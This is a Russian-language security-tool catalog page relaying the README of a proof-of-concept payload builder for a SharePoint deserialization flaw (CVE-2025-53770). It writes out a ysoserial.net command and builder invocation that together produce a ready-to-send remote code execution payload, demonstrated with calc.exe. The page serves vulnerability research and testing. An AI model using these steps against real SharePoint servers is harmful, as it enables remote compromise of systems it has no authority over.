Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/immersive-labs-sec/sharepoint-cve-2025-53770-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubimmersive-labs-sec/sharepoint-cve-2025-53770-poc

SharePoint-CVE-2025-53770-POC

C# инструмент, который создает GZip-сжатый и Base64-закодированный payload .NET DataSet с помощью LosFormatter для воспроизведения цепочки RCE через десериализацию в SharePoint (CVE-2025-53770).

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
41 год назадЕщё не проверено

OurSharePoint - CVE-2025-53770 (PoC)

Это простой инструмент на C#, который собирает GZipped, закодированный в Base64 полезный груз .NET DataSet, использующий внутренний полезный груз, закодированный с помощью LosFormatter. Он предназначен для воспроизведения цепочки удаленного выполнения кода (RCE) через десериализацию SharePoint, описанной в публичных исследованиях.


Что он делает

Вы передаете ему полезный груз в кодировке Base64 (например, от ysoserial.net), и он:

  • Оборачивает его внутри валидного .NET DataSet с пользовательской XML-схемой + diffgram
  • Сериализует результат с помощью BinaryFormatter
  • GZip-сжимает сериализованный блок
  • Кодирует результат в Base64 и записывает его в файл .b64

Ссылки

  • https://research.eye.security/sharepoint-under-siege/
  • https://github.com/rapid7/metasploit-framework/pull/20409/commits

Использование

Сначала сгенерируйте свой полезный груз с помощью ysoserial.net:

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > nested_gadget.b64

Затем запустите этот инструмент:

root@kitploit:~
OurSharePointBuilder.exe --in=nested_gadget.b64 --out=exploit --a=<random> --b=<random> --c=<random>

Это создаст:

  • exploit.bin - необработанный сериализованный DataSet
  • exploit.b64 - окончательный GZip-сжатый и закодированный в Base64 полезный груз, готовый к использованию

Также, если вы не укажете --a, --b или --c, инструмент генерирует случайные имена в нижнем регистре.

Примечания

root@kitploit:~
Этот инструмент не проверяет и не инспектирует переданный ему полезный груз.

Если вы тестируете локально и выполняете десериализацию вручную, он может выполниться (например, открыть калькулятор).
Скачать инструмент